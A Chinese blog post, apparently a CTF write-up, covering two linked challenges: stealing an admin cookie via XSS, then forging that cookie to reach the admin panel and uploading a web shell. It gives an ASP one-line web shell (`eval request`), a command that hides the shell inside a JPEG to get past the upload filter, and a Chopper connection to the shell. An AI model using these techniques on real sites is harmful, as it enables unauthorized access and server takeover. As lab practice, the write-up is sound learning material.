IT辅导娱乐网| 蜘蛛地图| 所有文章|
ctf练习 - IT辅导
  • 首页
  • IT技术 IT辅导资源网设计图
    • DVWA靶场
    • sqli-lab靶场
  • 源码基地
  • 软件分享 IT辅导资源网设计图
    • 辅助软件
  • emlog教程
  • 白嫖活动
  • 网络技巧 IT辅导资源网设计图
    • seo教程
  • 编程教程
  • 值得看一看 IT辅导资源网设计图
    • 值得听一听
    • 读懂世界
    • 活动线报
  • 更多功能 IT辅导资源网设计图
    • 在线投稿
    • 公告动态
    • 广告合作
    • 匿名投稿


登录后,享受更多优质服务哦
IT辅导资源网站长qq头像
欢迎回来,可爱的会员!个人中心退出登录
导航菜单
  • 首页
  • IT技术
    • DVWA靶场
    • sqli-lab靶场
  • 源码基地
  • 软件分享
    • 辅助软件
  • emlog教程
  • 白嫖活动
  • 网络技巧
    • seo教程
  • 编程教程
  • 值得看一看
    • 值得听一听
    • 读懂世界
    • 活动线报
  • 更多功能
    • 在线投稿
    • 公告动态
    • 广告合作
    • 匿名投稿

ctf练习

2020/3/31 五年级扛把子  IT技术


一.在这里插入图片描述看题目这是一道利用xss偷取管理员cookie的题目。
那么我们就去xss测试一哈子
在这里插入图片描述
在这里插入图片描述在这里插入图片描述发现确实存在xss漏洞
那么我们如何偷去管理员cookie呢?
题目tips:xss bot 每10秒访问一次页面
说明我们可以尝试去盗取了
这里要用到一些XSS平台,让管理员的cookie暴露出来。
使用这条语句
在这里插入图片描述然后后台管理员一点击审核查看我们的留言就会中招,在这里插入图片描述这里已经盗取了他的cookie。(flag也得到了)
那么我们可以用他的cookie做些什么呢?
接着请看下一题

二.在这里插入图片描述
在这里插入图片描述通过题目我们知道这里的cookie为上一题我们盗取的cookie。
这时我们伪造cookie登录后台
这里利用一个插件,当然F12也可以伪造cookie
在这里插入图片描述然后刷新就可以进入后台了
在这里插入图片描述然后根据题目就是要找一个上传点了;
随意点击网站查找可能存在上传点的地方
在这里插入图片描述这里貌似就可以,我们尝试随便上传张图片试试,
在这里插入图片描述在这里插入图片描述上传成功并且还显示路径及上传后的随机名字
那么我们直接asp上传一句话试试,发现
在这里插入图片描述
这里发现有限制
怎么办呢?
我们可以把一句话写入图片中…
cmd命令 copy 1.jpg /b+ 1.asp 11.jpg
大致意思为把1.asp内容放进1.jpg中生成11.jpg
其实也可以直接用记事本将图片打开放进一句话…但我们这样坏处是图片已经被搞坏了,容易被管理员发现…
然后上传
然后利用一句话,<%eval request (“pass”)%> pass可以随意改,是我们的一句话密码
使用菜刀连接.
菜刀尽量放虚拟机,可能有后门
在这里插入图片描述然后双击666…
哦.不对,是直接双击就可以了.
就可以发现目录下有flag.txt了

菜刀的作用有很多,也可以添加之后,右键点击虚拟终端,运行命令。
whoami 发现权限贼小
然后可以尝试提权…(还没搞透彻…就不说了)


 点赞:0  打赏  分享  海报

  • 打赏支付宝扫一扫
  • 打赏微信扫一扫
  • 打赏企鹅扫一扫
结束语
温馨提醒:如有技术问题以及资源失效请联系站长 QQ89549822 进行反馈!!!
 您阅读本文耗时: 0小时02分35秒
热度:908° 发布时间:2020年3月31日

推荐:

标题:ctf练习

链接: https://www.itfd.cn/post-118.html

版权:转载请注明来源于【IT辅导娱乐网】为原创

上一篇: 蓝鲸安全ctf打卡隐写篇----第一期

下一篇: C++虚继承时的内存布局详解

作者头像 作者名称 作者性别
五年级扛把子
联系作者 作者主页

热门推荐

1 Xshell远程连接kali系统详细设置
2 "没有权限打开或修改文件"解决方法
3 windows dos基本命令详细教程
4 端口扫描技术-web安全
5 转 PHP网站从Apache转移到Nginx后产生404错误的原因和解决办法
6 网页301重定向自动跳转代码汇总

评论列表

取消回复

  • 存档

    • 2020年10月(15)
    • 2020年9月(248)
    • 2020年8月(92)
    • 2020年7月(5)
    • 2020年6月(224)
    • 2020年5月(392)
    • 2020年4月(267)
    • 2020年3月(76)
    • 2019年3月(1)
    • 1970年1月(29)
  • 搜索

  • 热门文章

    • 神佑之路手游源码-附视频教程
    • 最新可用老王VPN2.22.15谷歌市场版,免费使用
    • 私藏的十个网站,不看后悔系列
    • 虚拟商品自动发货商城源码
    • 不吃苦、不奋斗,你要青春做什么?
  • 随机文章

      • WordPress后台、主题、插件翻译插件: Loco Translate
        • 官方百度网盘不限速来了_抓紧体验!
          • 天猫新一期幸运列车 夏日巡游集卡兑换红包
            • linux6.8 lamp 常用命令大全
              • mysql开启远程访问权限
    提示信息

    SQL语句执行错误: SELECT COUNT(*) AS total FROM emlog_twitter
    Table 'itfd.emlog_twitter' doesn't exist

    «点击返回